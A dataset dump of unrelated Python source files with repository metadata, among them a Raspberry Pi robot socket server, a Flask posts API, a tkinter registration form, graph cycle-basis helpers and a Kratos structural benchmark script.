] | permissive | Vetrovec/chainee | ed4edd4e92637b29fcf5ff0493de6f6983e66e98 | 3a1a300f86ad8aeb385d8de7f766dd035c039f04 | refs/heads/master | 2022-04-05T13:54:38.804711 | 2020-02-01T14:11:16 | 2020-02-01T14:11:16 | 235,657,376 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 971 | py | from unittest import TestCase
from chainee.block import Block


class TestBlock(TestCase):
    def setUp(self):
        address = "c70f4891d2ce22b1f62492605c1d5c2fc1a8ef47"
        timestamp = 1579861388
        self.block = Block(0, "0" * 64, address, 0, timestamp, 0)

    def test_hash(self):
        self.assertEqual(
            self.block.hash(),
            "075869850a068c32c4e8aca47218c3a65fa3a0de83b529af335c56a3d3c5df62"
        )

    def test_serialize(self):
        self.assertEqual(
            self.block.serialize(False).hex(),
            "000000000000000000000000000000000000000000000000000000000000000000000000c70f4891d2ce22b1f62492605c1d5c2fc1a8ef47a7ffc6f8bf1ed76651c14756a061d662f580ff4de43b49fa82d80a4b80f8434a000000008cc52a5e00000000"
        )

    def test_deserialize(self):
        serialized = self.block.serialize(False)
        temp_block = Block.deserialize(serialized)
        self.assertEqual(serialized, temp_block.serialize(False))
| [
"[email protected]"
] | |
d5dd79518c88daae27d17853642256525b0734a7 | b1a259bed1daeee5928031253b05e2b2b32f5e06 | /clash/project/migrations/0034_register_freezeflag.py | af075a0e020f1080fbb1cd63945ad22fd4fa3b05 | [] | no_license | meghadandapat/Clash-Round-1 | 8cb7ad566e8006e03fb72c2387df26bea94d4dfa | 249ebaaeb8f8fa40dd5d086aeac77defb89b366a | refs/heads/main | 2023-07-24T18:44:14.490307 | 2021-09-06T07:45:10 | 2021-09-06T07:45:10 | 376,589,654 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 392 | py | # Generated by Django 3.1 on 2021-01-16 13:21
from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('project', '0033_register_get_chance'),
    ]

    operations = [
        migrations.AddField(
            model_name='register',
            name='freezeflag',
            field=models.BooleanField(default=False),
        ),
    ]
| [
"[email protected]"
] | |
10cfe7800595cae7d45d464a2bce17b1b7589fc4 | d45cd48273bef68dabc5c46c3becfafed6dcfe47 | /PiBotRemoteFiles/server.py | 88b0cc25a9e561c8b18ea9bfa00a175936b9e1dd | [] | no_license | robert-swanson/PiBot | ab1313c850f8ec3d30bedc217f5af768dbabdb83 | 775bc098a4d25083c7d2410415ed498fb4e161f8 | refs/heads/master | 2020-03-18T08:17:02.044880 | 2019-10-08T04:15:43 | 2019-10-08T04:15:43 | 134,500,782 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,065 | py | import socket
import time
import sys
import io
from threading import Thread
try:
    import RPi.GPIO as GPIO
except:
    print("Not Pi")

# Connection
port = 2000
ping = False
s = None
c = None

# GPIO
PWMA = 7    # Left Speed
AIN1 = 12   # Left Forward
AIN2 = 11   # Left Backward
STBY = 13
BIN1 = 15   # Right Forward
BIN2 = 16   # Right Backward
PWMB = 18   # Right Speed
SERVO = 22
connected = 37
replaying = 38
data = 40

lPWM = None
rPWM = None
sPWM = None

history = []
timer = 0
stop = False
lastServoCommand = 0
servoWaiting = False


def isNum(s):
    try:
        float(s)
        return True
    except ValueError:
        return False


def main():
    global port
    if len(sys.argv) > 1:
        port = int(sys.argv[1])
    global PWMA, AIN1, AIN2, STBY, BIN1, BIN2, PWMB, SERVO, connected, replaying, data
    for i in range(2, len(sys.argv)):
        val = sys.argv[i]
        if(i == 2):
            PWMA = int(val)
            print("PWMA = " + val)
        elif(i == 3):
            AIN1 = int(val)
        elif(i == 4):
            AIN2 = int(val)
        elif(i == 5):
            STBY = int(val)
        elif(i == 6):
            BIN1 = int(val)
        elif(i == 7):
            BIN2 = int(val)
        elif(i == 8):
            PWMB = int(val)
        elif(i == 9):
            SERVO = int(val)
        elif(i == 10):
            connected = int(val)
        elif(i == 11):
            replaying = int(val)
        elif(i == 12):
            data = int(val)
            print("data = " + val)
    try:
        netLoop()
    except Exception as e:
        print("ERROR: " + str(e))
        time.sleep(1)
        global s
        if s != None:
            s.close()
    finally:
        print("Closing Client")


def netLoop():
    global s
    s = socket.socket()
    s.bind(('', port))
    on(data)
    print(PWMA)
    print(AIN1)
    print(AIN2)
    print(BIN1)
    print(BIN2)
    print(PWMB)
    print(STBY)
    print(replaying)
    print(connected)
    print(data)
    print("Listening on port " + str(port) + "...")
    s.listen(5)
    global c
    c, addr = s.accept()
    on(connected)
    off(data)
    print(str(addr))
    while True:
        input = c.recv(1024).strip()[:-1]
        comms = input.split("$")
        for i in range(len(comms)):
            comm = comms[i]
            if((not isNum(comm) and not (len(comm.split(" ")) > 1) or (i == len(comms)-1)) and interpret(comm)):
                return


def interpret(input):
    # print("Interpreting: " + input)
    on(data)
    if input == b'':
        return True
    elif input == b'close':
        c.send("ping")
        print("Closed by server")
        return True
    elif input == b'ping':
        if ping:
            print("Ping Successful")
        else:
            print("Ping")
        c.send("ping")
    elif input == b'forward':
        print("starting replay")
        Thread(target=playForward).start()
    elif input == b'backward':
        print("starting rewind")
        Thread(target=playBackward).start()
    elif input == b'clear':
        global history
        history = []
        print("cleared")
    elif input == b'stop':
        global stop
        stop = True
        updateGPIO(0, 0)
        print("stop")
    else:
        try:
            nums = input.split(" ")
            if(len(nums) >= 2):
                l = float(nums[0])
                r = float(nums[1])
                updateGPIO(l, r)
                addEventToHistory(l, r)
            elif(len(nums) == 1 and SERVO > 0):  # Servo
                global sPWM
                global lastServoCommand
                global servoWaiting
                sPWM.start(2.5)
                lastServoCommand = time.time()
                if not servoWaiting:
                    sPWM = GPIO.PWM(SERVO, 50)
                    sPWM.start(float(nums[0]))
                    Thread(target=servoWait).start()
                else:
                    sPWM.ChangeDutyCycle(float(nums[0]))
        except Exception as e:
            print(e)
            print("Unknown Message: " + input)
            pass
    off(data)


def servoWait():
    global servoWaiting
    global lastServoCommand
    servoWaiting = True
    blink = False
    while time.time() - lastServoCommand <= .1:
        time.sleep(.1)
    sPWM.stop()
    servoWaiting = False


def addEventToHistory(l, r):
    global timer
    history.append([l, r])
    if timer != 0:
        dur = time.time() - timer
        history[len(history) - 2].append(dur)
    timer = time.time()


def playForward():
    print(history)
    global stop
    on(replaying)
    stop = False
    global timer
    for event in history:
        if stop:
            break
        if event[0] != 0 and event[1] != 0:
            updateGPIO(event[0], event[1])
        if len(event) >= 3:
            time.sleep(event[2])
        else:
            updateGPIO(0, 0)
    updateGPIO(0, 0)
    stop = False
    off(replaying)
    c.send("done")
    print("done replay")


def playBackward():
    global stop
    on(replaying)
    stop = False
    global timer
    for i in range(len(history)):
        index = len(history) - 1 - i
        event = history[index]
        if stop:
            break
        if event[0] != 0 and event[1] != 0:
            updateGPIO(-event[0], -event[1])
        if len(event) >= 3:
            time.sleep(event[2])
        else:
            updateGPIO(0, 0)
    updateGPIO(0, 0)
    stop = False
    off(replaying)
    c.send("done")
    print("done rewind")


# GPIO --------------------------------------------
def setout(pin):
    if(pin > 0 and pin <= 40):
        GPIO.setup(pin, GPIO.OUT)
    else:
        print("ignoring pin")


def setupGPIO():
    GPIO.setmode(GPIO.BOARD)
    setout(PWMA)
    setout(AIN1)
    setout(AIN2)
    setout(STBY)
    setout(BIN1)
    setout(BIN2)
    setout(PWMB)
    setout(connected)
    setout(replaying)
    setout(data)
    setout(SERVO)
    GPIO.output(STBY, True)

    global lPWM
    global rPWM
    global sPWM
    lPWM = GPIO.PWM(PWMA, 100)
    rPWM = GPIO.PWM(PWMB, 100)
    if(SERVO > 0):
        sPWM = GPIO.PWM(SERVO, 50)
    lPWM.start(0)
    rPWM.start(0)


def updateGPIO(lS, rS):
    lS *= 100
    rS *= 100
    if lS > 100: lS = 100
    if lS < -100: lS = -100
    if rS > 100: rS = 100
    if rS < -100: rS = -100
    lPWM.ChangeDutyCycle(abs(lS))
    rPWM.ChangeDutyCycle(abs(rS))
    GPIO.output(AIN1, lS >= 0)
    GPIO.output(AIN2, lS < 0)
    GPIO.output(BIN1, rS >= 0)
    GPIO.output(BIN2, rS < 0)


def on(pin):
    if((pin > 0) and (pin <= 40)):
        GPIO.output(pin, True)
    else:
        print("Invalid Pin: " + str(pin))


def off(pin):
    if((pin > 0) and (pin <= 40)):
        GPIO.output(pin, False)
    else:
        print("Invalid Pin: " + str(pin))
# -------------------------------------------------


print("Just so that at least something is printed")
try:
    try:
        setupGPIO()
    except: pass
    main()
finally:
    try:
        off(connected)
        off(data)
        GPIO.cleanup()
    except: pass
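
# Wire-protocol sketch from the client side (hostname is a placeholder; the
# robot listens on port 2000 by default):
#
#     import socket
#     sock = socket.create_connection(('raspberrypi.local', 2000))
#     sock.send('0.5 0.5$')   # "<left> <right>" drives both motors at half speed
#     sock.send('7.5$')       # a single number sets the servo duty cycle
#     sock.send('stop$')
#     sock.send('close$')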
| [
"[email protected]"
] | |
dadbd938b2cbd707de7f77ea6959a52b24f60efd | 2cdcda6a22d8f540f6152583391e13b5a0e49fab | /controller/create.py | 99c8aa9cc6d1e67329b8b991e1c8fdbd67d74c99 | [] | no_license | Faylixe/remix-factory | f17dd5a043b67e6f2b2d1cd01df74aede772c270 | 6b4a475aa597d1e081b34f9c3457c90f1410ea4b | refs/heads/master | 2021-01-20T15:59:36.349837 | 2016-06-03T08:53:23 | 2016-06-03T08:53:23 | 58,656,446 | 9 | 1 | null | null | null | null | UTF-8 | Python | false | false | 929 | py |
#!/usr/bin/python
import time
from shutil import copyfile

from controller import Controller


class NeuronFactory(Controller):
    """A NeuronFactory is in charge of creating neurons.

    It uses a source neuron as a template for all other neurons to be created,
    and copies this source neuron each time the __call__ method is used.
    """

    def __init__(self, source, size):
        """Default constructor.

        :param source: Path of the source file the neuron will be created from.
        :param size: Number of neurons to be created through this controller.
        """
        Controller.__init__(self, size, "Creating neurons")
        self.source = source

    def __call__(self, neuron):
        """Creates an empty model as a compressed file for the given neuron.

        :param neuron: Neuron to create a file for.
        """
        copyfile(self.source, neuron.getCompressedFile())
        self.next()
| [
"[email protected]"
] | |
99c0f4291f705d20be4f080691bf7e32fef35a65 | b96bc06efe67d89d909f758f22cbdca46bde17f1 | /defect/graph/cyclebasis/pub.py | 653331bc06882337d3be76fcd31152f8dd32e689 | [] | no_license | ExpHP/defect | ecf9f5c8d36384faa90495e9ee63ad4bc2939fe9 | 4541365861002f3d927aff44f34c38fddee13ca7 | refs/heads/master | 2021-06-15T04:59:42.781209 | 2021-02-03T02:29:04 | 2021-02-03T02:29:04 | 34,793,996 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,309 | py |
# cyclebasis/pub.py -- public functions to be exported from defect.graph.cyclebasis
# (nothing interesting here; just delegates to implementations located elsewhere).

from . import _planar
from defect.graph.cyclebasis.builder import CycleBasisBuilder
import defect.filetypes.internal as fileio

import networkx as nx

from defect.util import unzip_dict


def planar(g, pos):
    '''
    Construct cyclebasis from planar embedding.

    May be invoked in the following ways:

    * ``planar(g, pos)``, where ``pos`` is a dict of ``{node: (x,y)}``
      describing a planar embedding of the nodes in ``g``.
    * ``planar.from_gpos(g, path)``, where ``path`` is a filepath to
      a ``.planar.gpos`` file that provides an embedding for ``g``.
    '''
    xs, ys = unzip_dict(pos)
    return _planar.planar_cycle_basis_nx(g, xs, ys)

# attach secondary method of invocation
def _from_gpos(g, path):
    pos = fileio.gpos.read_gpos(path)
    return planar(g, pos)
planar.from_gpos = _from_gpos


def from_file(path):
    '''
    Read a cyclebasis from a .cycles file.

    This always puts the cycles into the format expected by the
    defect trial (in contrast to ``defect.filetypes.internal.cycles.read_cycles``
    which has extraneous options)
    '''
    # TODO we should validate the cyclebasis against g here
    # (I thought I had a method which did this, but can't find it...)
    return fileio.cycles.read_cycles(path, repeatfirst=True)


def last_resort(g):
    '''
    Produce a (low-quality) cyclebasis using a fast and reliable method.

    This should be avoided for graphs of any decent size, as it tends
    to produce cyclebases which have a lot of overlap, leading to a
    dense resistance matrix. (if you have a dense resistance matrix,
    you're gonna have a bad time)
    '''
    cycles = list(nx.cycle_basis(g))
    for c in cycles:
        c.append(c[0])  # make loop
    return cycles


#-----------------------------------------------------------
# cbupdaters, which are provided to CurrentMeshSolver so it can... update the cbs.

class planar_cbupdater:
    '''
    Allows one to update a cyclebasis in response to changes in the graph.
    Do not use this one.
    '''
    def init(self, cycles):
        self.cycles = cycles

    def remove_vertex(self, g, v):
        self.cycles = _planar.without_vertex(self.cycles, v)

    def get_cyclebasis(self):
        return self.cycles


class builder_cbupdater:
    '''
    Allows one to update a cyclebasis in response to changes in the graph.

    This one keeps track of basis elements and linear dependencies by
    building and maintaining a bit matrix in REF form.
    '''
    def init(self, cycles):
        self.builder = CycleBasisBuilder.from_basis_cycles(cycles)

    def remove_vertex(self, g, v):
        self.builder.remove_vertex(v)

    def get_cyclebasis(self):
        return self.builder.cycles


class dummy_cbupdater:
    '''
    Does NOT allow one to update a cyclebasis in response to changes in the graph,
    and instead throws exceptions if you try to do anything remotely change-y.

    This exists because ``CurrentMeshSolver`` always expects a ``cbupdater`` even
    if it does not modify the graph. With a ``dummy_cbupdater``, it is possible
    to use ``CurrentMeshSolver`` to compute currents only for the initial state.
    '''
    def init(self, cycles):
        self.cycles = cycles

    def remove_vertex(self, g, v):
        raise NotImplementedError("dummy_cbupdater")

    def get_cyclebasis(self):
        return self.cycles
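
# Usage sketch (assumes `g` is a planar networkx graph and `pos` maps each
# node to an (x, y) coordinate):
#
#     cycles = planar(g, pos)
#     updater = dummy_cbupdater()
#     updater.init(cycles)
#     basis = updater.get_cyclebasis()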
| [
"[email protected]"
] | |
d0f4a4d3c6e36cf9f46459e8e32757ab3bffd737 | d088652daa2cdbacf66884e5c62dd0e09326e8d3 | /Week 3 Labs/Week3 Activity10.py | 9284631f9b0f667d2a176d23aeaba7eafe26bc1c | [] | no_license | redyelruc/AdvProgModule | beac4e0e60253f6f039fd03a08ad2e520e1a007a | fdb7ac492ce464ace6286ca94448bd37172f4203 | refs/heads/master | 2023-02-04T15:14:12.125839 | 2020-12-18T12:07:00 | 2020-12-18T12:07:00 | 310,256,254 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,885 | py | from tkinter import ttk
import tkinter.scrolledtext as tkscrolled
import tkinter as tk


def open_main_window(title, x, y):
    # set up main window
    root = tk.Tk()
    root.title(title)
    root.geometry(f"{x}x{y}")
    return root


def make_grid_rows_and_columns(window, rows, columns):
    for i in range(rows):
        window.grid_rowconfigure(i, weight=1, uniform="group1")
    for i in range(columns):
        window.grid_columnconfigure(i, weight=1, uniform="group1")


def add_labels_to_main_window(window, labels):
    r = 1
    for l in labels:
        tk.Label(window, text=l, anchor='w', padx=10, font=("Helvetica", 14))\
            .grid(row=r, column=0, columnspan=2, sticky="nw")
        r = r + 2


def add_text_entry_box(window, row, column, text):
    entry = tk.Entry(window, font=("Helvetica", 14))
    entry.grid(row=row, column=column, columnspan=3, sticky="nw")
    entry.insert(tk.END, text)


def add_button(window, row, column, name):
    b = tk.Button(window, text=name, borderwidth=3, font=("Helvetica", 14), relief=tk.RAISED)
    b.grid(row=row, column=column, rowspan=2, columnspan=3, ipady=5, ipadx=5, pady=(15, 15), padx=(25, 25))


def add_combobox(window, row, column, values):
    combo = ttk.Combobox(window, font=("Helvetica", 14))
    combo.grid(row=row, column=column, columnspan=3, sticky="nw")
    combo.set("ComboBox")
    combo['values'] = values


def add_scrolled_textbox(window, row, column, text):
    bio = tkscrolled.ScrolledText(window, wrap=tk.WORD, font=("Helvetica", 14))
    bio.grid(row=row, column=column, padx=10, pady=5, rowspan=1, columnspan=9, sticky="nw")
    bio.insert(tk.INSERT, text)


def add_frame_with_radio_buttons(window, options):
    frame1 = tk.Frame(window, bg="light gray", relief='sunken')
    frame1.grid(row=1, column=6, rowspan=3, columnspan=3, padx=(10, 10), sticky="nwe")
    mod = tk.StringVar()
    mod.set("Currently Employed")  # initialize
    r = 0
    for option in options:
        b = tk.Radiobutton(frame1, text=option, bg="light gray", variable=mod, value=option)
        b.grid(row=r, column=1, sticky="nw")
        r += 1


def add_frame_with_checkboxes(window, options):
    frame2 = tk.Frame(window, bg="light gray", relief='sunken')
    frame2.grid(row=5, column=6, rowspan=3, columnspan=3, padx=(10, 10), sticky="nwe")
    r = 0
    for option in options:
        b = tk.Checkbutton(frame2, text=option, bg="light gray")
        b.grid(row=r, column=1, sticky="nw")
        r += 1


def main():
    # draw main window
    root = open_main_window("Register Personal Details", 650, 500)
    make_grid_rows_and_columns(root, 15, 10)

    # add labels and text entry box
    labels = ['Name:', 'Profession:', 'Position:', 'Biography:']
    add_labels_to_main_window(root, labels)
    add_text_entry_box(root, 1, 2, "Name")

    # add combo boxes
    jobs = ["Accountant", "Architect", "Doctor", "Engineer", "Teacher"]
    positions = ["Officer", "Assistant Manager", "Manager", "Managing Director", "CEO"]
    add_combobox(root, 3, 2, jobs)
    add_combobox(root, 5, 2, positions)

    text = "Secrevit fontes liquidum locoque pronaque?\nIllas semine " \
           "campoque declivia oppida corpora nam inter fuit discordia " \
           "tellus solidumque iunctarum erat: quae terrenae ubi rerum recessit iudicis aestu fixo"
    add_scrolled_textbox(root, 8, 0, text)

    # add frames to the right hand side
    buttons = ["Currently Employed", "Self Employed", "Unemployed", "Other"]
    add_frame_with_radio_buttons(root, buttons)
    checkboxes = ["Student (Part/Full-time)", "Home Owner", "Transport Owner"]
    add_frame_with_checkboxes(root, checkboxes)

    # add buttons at bottom
    add_button(root, 13, 0, 'Clear')
    add_button(root, 13, 7, 'Submit')
    add_button(root, 13, 5, 'Cancel')

    # launch the GUI
    root.mainloop()


if __name__ == "__main__":
    main()
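
# Note: add_button wires no command callback, so the buttons do nothing when
# pressed; a hypothetical extension would pass one in, e.g.
#
#     b = tk.Button(window, text=name, command=lambda n=name: print(n, "clicked"))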
| [
"[email protected]"
] | |
1cd6060ec53429c1f851fd3349cf3951c197cc77 | aeee61b6532965f03a6c9b0a1c50e8e0b5919cb2 | /andrewtomai/api/post_api.py | 9a3a457356f346846ba1cd5666b6927abaaaf529 | [] | no_license | andrewtomai/super-website | 50516258e505d7705f8a0e2a69341cec2f8a5ff8 | 87c2c8dded350d06f1125ac2dad2bb09afcb4761 | refs/heads/master | 2021-05-07T20:41:00.306789 | 2017-12-17T18:12:43 | 2017-12-17T18:12:43 | 108,932,514 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,593 | py | """
REST API for all posts.

URLs include:
/api/p/
/api/p/<postId>
"""
from andrewtomai.api.upload_helper import upload_file
import andrewtomai
import flask


@andrewtomai.app.route('/api/p/', methods=['GET', 'POST'])
def list_posts():
    """List all the most recent posts."""
    if flask.request.method == 'GET':
        # if this is a GET request, the user need not be logged in
        size = flask.request.args.get('size', default=5, type=int)
        page = flask.request.args.get('page', default=0, type=int)
        # error check this request
        if size < 0 or page < 0:
            return flask.jsonify({
                "message": "Bad Request",
                "status_code": 400}), 400
        return flask.jsonify(get_posts(size, page))
    else:
        # if this is a POST request, the user must be logged in as a root user!
        # FIXME remove this next line when not testing
        # flask.session['logname'] = 'atomai'
        if 'logname' not in flask.session:
            return flask.jsonify({
                "message": "Unauthorized",
                "status_code": 401}), 401
        return submit_post()


@andrewtomai.app.route('/api/p/<int:postid>/', methods=['GET'])
def individual_post(postid):
    """Get an individual post."""
    database = andrewtomai.model.get_db()
    # get the specific post
    cursor = database.execute(
        "SELECT * "
        "FROM posts "
        "WHERE postid = ?;", (postid,)
    )
    post = cursor.fetchone()
    if post is None:
        return flask.jsonify({"message": "Not Found", "status_code": 404}), 404
    context = {
        'age': post['created'],
        'banner_url': flask.url_for(
            '.uploaded_file',
            filename=post['banner']
        ),
        'text': post['text']
    }
    return flask.jsonify(context)


def submit_post():
    """Submit a post to the website."""
    database = andrewtomai.model.get_db()
    cursor = database.execute(
        "SELECT usertype FROM users "
        "WHERE username = ?",
        (flask.session['logname'],)
    )
    usertype = cursor.fetchone()['usertype']
    if usertype != 0:
        return flask.jsonify({
            "message": "Forbidden",
            "status_code": 403}), 403
    banner_name = upload_file()
    cursor = database.execute(
        "INSERT INTO posts ("
        "banner, text, created) "
        "VALUES (?, ?, CURRENT_TIMESTAMP)",
        (banner_name, flask.request.form['post_text'])
    )
    database.commit()
    return flask.jsonify({'status': 'success'})


def get_posts(size, page):
    """Get most recent posts."""
    database = andrewtomai.model.get_db()
    cursor = database.execute(
        "SELECT postid FROM posts "
        "ORDER BY postid DESC "
        "LIMIT ? "
        "OFFSET ?;",
        (size, size * page)
    )
    posts_list = cursor.fetchall()
    posts = {}
    posts['results'] = []
    for post in posts_list:
        posts['results'].append({'url': flask.url_for(
            '.individual_post',
            postid=post['postid']
        )})
    # get the number of total posts for the 'next' parameter
    cursor = database.execute(
        "SELECT COUNT(*) FROM posts"
    )
    total_posts = cursor.fetchone()['COUNT(*)']
    if total_posts > (size * page) + size:
        # there is a next page
        parameters = "?size=" + str(size) + "&page=" + str(page + 1)
        posts['next'] = flask.url_for('.list_posts') + parameters
    else:
        # there is no next page of posts
        posts['next'] = ''
    posts['url'] = flask.url_for('.list_posts')
    return posts
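
# Hypothetical requests against a local development server:
#
#     curl 'http://localhost:5000/api/p/?size=5&page=0'   # paginated listing
#     curl 'http://localhost:5000/api/p/1/'               # a single post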
| [
"[email protected]"
] | |
146f9ccf026d8c0817580d91e077a72f246b7d52 | b54b6168ba35ce6ad34f5a26b5a4a3ab8afa124a | /kratos_3_0_0/applications/structural_application/test_examples/cantilever3d.gid/cantilever3dstatic_superlu_benchmarking.py | 728d0617a9bab45f572057ea8066cb7e7d3b02c9 | [] | no_license | svn2github/kratos | e2f3673db1d176896929b6e841c611932d6b9b63 | 96aa8004f145fff5ca6c521595cddf6585f9eccb | refs/heads/master | 2020-04-04T03:56:50.018938 | 2017-02-12T20:34:24 | 2017-02-12T20:34:24 | 54,662,269 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,795 | py | def FindNode(node_list,x,y,z):
    for node in node_list:
        if ((node.X - x) ** 2 + (node.Y - y) ** 2 + (node.Z - z) ** 2 < 0.0000001):
            print node
            return node


def BenchmarkCheck(time, node1, node2, node3, node4):
    benchmarking.Output(time, "Time")
    benchmarking.Output(node1.GetSolutionStepValue(DISPLACEMENT_X), "Node 1 Displacement_x", 0.00001)
    benchmarking.Output(node1.GetSolutionStepValue(DISPLACEMENT_Y), "Node 1 Displacement_y", 0.00001)
    benchmarking.Output(node1.GetSolutionStepValue(DISPLACEMENT_Z), "Node 1 Displacement_z", 0.00001)
    benchmarking.Output(node2.GetSolutionStepValue(DISPLACEMENT_X), "Node 2 Displacement_x", 0.00001)
    benchmarking.Output(node2.GetSolutionStepValue(DISPLACEMENT_Y), "Node 2 Displacement_y", 0.00001)
    benchmarking.Output(node2.GetSolutionStepValue(DISPLACEMENT_Z), "Node 2 Displacement_z", 0.00001)
    benchmarking.Output(node3.GetSolutionStepValue(REACTION_X), "Node 3 Reaction_x", 0.00001)
    benchmarking.Output(node3.GetSolutionStepValue(REACTION_Y), "Node 3 Reaction_y", 0.00001)
    benchmarking.Output(node3.GetSolutionStepValue(REACTION_Z), "Node 3 Reaction_z", 0.00001)
    benchmarking.Output(node4.GetSolutionStepValue(REACTION_X), "Node 4 Reaction_x", 0.00001)
    benchmarking.Output(node4.GetSolutionStepValue(REACTION_Y), "Node 4 Reaction_y", 0.00001)
    benchmarking.Output(node4.GetSolutionStepValue(REACTION_Z), "Node 4 Reaction_z", 0.00001)

#def AnalyticalResults(time, node1, node2, node3, node4):
#    benchmarking.Output(time, "Time")
#    benchmarking.Output(-0.221921365586, "Node 1 Displacement_x", 0.00001)
#    benchmarking.Output(-0.0361068223759, "Node 2 Displacement_y", 0.00001)
#    benchmarking.Output(51.6844785228, "Node 3 Reaction_x", 0.00001)
#    benchmarking.Output(-123.134969306, "Node 4 Reaction_y", 0.00001)

##################################################################
##################################################################
import sys
kratos_benchmarking_path = '../../../../benchmarking'  ##kratos_root/benchmarking
sys.path.append(kratos_benchmarking_path)
import benchmarking

#import the configuration data as read from the GiD
import Kratos_Structural_Application_var

##find neighbours if required
def FindNeighbours():
    if(Kratos_Structural_Application_var.FindNodalNeighbours == "True"):
        number_of_avg_elems = 10
        number_of_avg_nodes = 10
        nodal_neighbour_search = FindNodalNeighboursProcess(model_part, number_of_avg_elems, number_of_avg_nodes)
        nodal_neighbour_search.Execute()
    if(Kratos_Structural_Application_var.FindElementalNeighbours == "True"):
        neighbour_calculator = FindElementalNeighboursProcess(model_part, 2, 10);
        neighbour_calculator.Execute()

##importing the rotational dofs degrees of freedom if necessary
def RotationalDofs():
    if(Kratos_Structural_Application_var.Rotational_Dofs == "True"):
        for node in model_part.Nodes:
            node.AddDof(ROTATION_X)
            node.AddDof(ROTATION_Y)
            node.AddDof(ROTATION_Z)

##################################################################
##################################################################
from time import *
print ctime()
t0 = clock()

#including kratos path
from KratosMultiphysics import *
from KratosMultiphysics.StructuralApplication import *
from KratosMultiphysics.ExternalSolversApplication import *

#setting the domain size for the problem to be solved
domain_size = Kratos_Structural_Application_var.domain_size

#defining a model part
model_part = ModelPart("StructurePart");
model_part.AddNodalSolutionStepVariable(FORCE);
if(Kratos_Structural_Application_var.Rotational_Dofs == "True"):
    model_part.AddNodalSolutionStepVariable(ROTATION);

import structural_solver_static as SolverType
SolverType.AddVariables(model_part)

#reading a model
name = Kratos_Structural_Application_var.problem_name

gid_mode = GiDPostMode.GiD_PostBinary
multifile = MultiFileFlag.MultipleFiles
deformed_mesh_flag = WriteDeformedMeshFlag.WriteUndeformed
write_conditions = WriteConditionsFlag.WriteElementsOnly
gid_io = GidIO(name, gid_mode, multifile, deformed_mesh_flag, write_conditions)
model_part_io = ModelPartIO(name)
model_part_io.ReadModelPart(model_part)

mesh_name = 0.0
gid_io.InitializeMesh(mesh_name);
gid_io.WriteMesh((model_part).GetMesh());
gid_io.FinalizeMesh()

##find neighbours if required
FindNeighbours();

model_part.Properties[1].SetValue(CONSTITUTIVE_LAW, Isotropic3D())
print "Linear elastic model selected"

print model_part
print model_part.Properties

#the buffer size should be set up here after the mesh is read for the first time
model_part.SetBufferSize(3)

##importing the rotational dofs degrees of freedom if necessary
RotationalDofs()

#importing the solver files
SolverType.AddDofs(model_part)
solver = SolverType.StaticStructuralSolver(model_part, domain_size)
solver.structure_linear_solver = SuperLUSolver()

CT = Kratos_Structural_Application_var.Convergence_Tolerance;
AT = Kratos_Structural_Application_var.Absolute_Tolerance;

if(Kratos_Structural_Application_var.Convergence_Criteria == "Displacement_Criteria"):
    solver.conv_criteria = DisplacementCriteria(CT, AT)
elif(Kratos_Structural_Application_var.Convergence_Criteria == "Residual_Criteria"):
    solver.conv_criteria = ResidualCriteria(CT, AT)
elif(Kratos_Structural_Application_var.Convergence_Criteria == "And_Criteria"):
    Displacement = DisplacementCriteria(CT, AT)
    Residual = ResidualCriteria(CT, AT)
    solver.conv_criteria = AndCriteria(Residual, Displacement)
elif(Kratos_Structural_Application_var.Convergence_Criteria == "Or_Criteria"):
    Displacement = DisplacementCriteria(CT, AT)
    Residual = ResidualCriteria(CT, AT)
    solver.conv_criteria = OrCriteria(Residual, Displacement)

node_1 = model_part.Nodes[3]
node_2 = model_part.Nodes[6]
node_3 = model_part.Nodes[1]
node_4 = model_part.Nodes[2]

solver.Initialize()
(solver).SetEchoLevel(2);

Dt = 0.001
nsteps = 5

print("initializing results")
gid_io.InitializeResults(mesh_name, (model_part).GetMesh())

for step in range(0, nsteps):
    time = Dt*step
    model_part.CloneTimeStep(time)

    #print model_part.ProcessInfo()[TIME]

    #solving the fluid problem
    if(step > 3):
        solver.Solve()

        if (benchmarking.InBuildReferenceMode()):
            #AnalyticalResults(time, node_1, node_2, node_3, node_4)
            BenchmarkCheck(time, node_1, node_2, node_3, node_4)
        else:
            BenchmarkCheck(time, node_1, node_2, node_3, node_4)

    #print the results
    gid_io.WriteNodalResults(DISPLACEMENT, model_part.Nodes, time, 0)
    gid_io.WriteNodalResults(REACTION, model_part.Nodes, time, 0)

gid_io.FinalizeResults()
print "Completed Analysis"
| [
"pooyan@4358b7d9-91ec-4505-bf62-c3060f61107a"
] | pooyan@4358b7d9-91ec-4505-bf62-c3060f61107a |
8554c7b4aa1726196474b9654b35e9aa4b761cb6 | dea374ac0c61caae2b87a0fd1ad104db8199a53b | /process_data.py | 425a11161c61419a80b69951af74d34e7b688fa2 | [] | no_license | xiaoguan002/NSF | 22914fe5e685856df97be6ce0c04b67d3f689647 | b278c3874993033db16e51ad811e99f06edec1a9 | refs/heads/master | 2021-01-10T01:19:23.843642 | 2017-03-01T03:52:21 | 2017-03-01T03:52:21 | 54,110,576 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,187 | py | import numpy as np
import cPickle
from collections import defaultdict
import sys, re
import pandas as pd
import MySQLdb
import string
def build_data_cv(cv=10, clean_string=True):
"""
Loads data and split into 10 folds.
"""
try:
conn=MySQLdb.connect('private')
cur=conn.cursor()
cur.execute('select AbstractNarration, OrganizationDivisionLongName from nsfmain')
results_code=cur.fetchall()
cur.close()
conn.close()
except MySQLdb.Error,e:
print "Mysql Error %d: %s" % (e.args[0], e.args[1])
revs = []
vocab = defaultdict(float)
for r in results_code:
div = 0
if r[1] == 'Division of Computer and Network Systems' or r[1] == 'Division Of Computer and Network Systems':
div = 0
elif r[1] =='Div Of Information & Intelligent Systems' or r[1] =='Division of Information & Intelligent Systems':
div = 1
elif r[1] =='Division of Computing and Communication Foundations' or r[1] =='Division of Computer and Communication Foundations'or \
r[1]== 'Div Of Computer & Communication Foundati':
div = 2
elif r[1] =='Division of Advanced CyberInfrastructure' or r[1] =='Div Of Advanced Cyberinfrastructure':
div = 3
else :
continue
rev = []
if r[0] == '':
continue
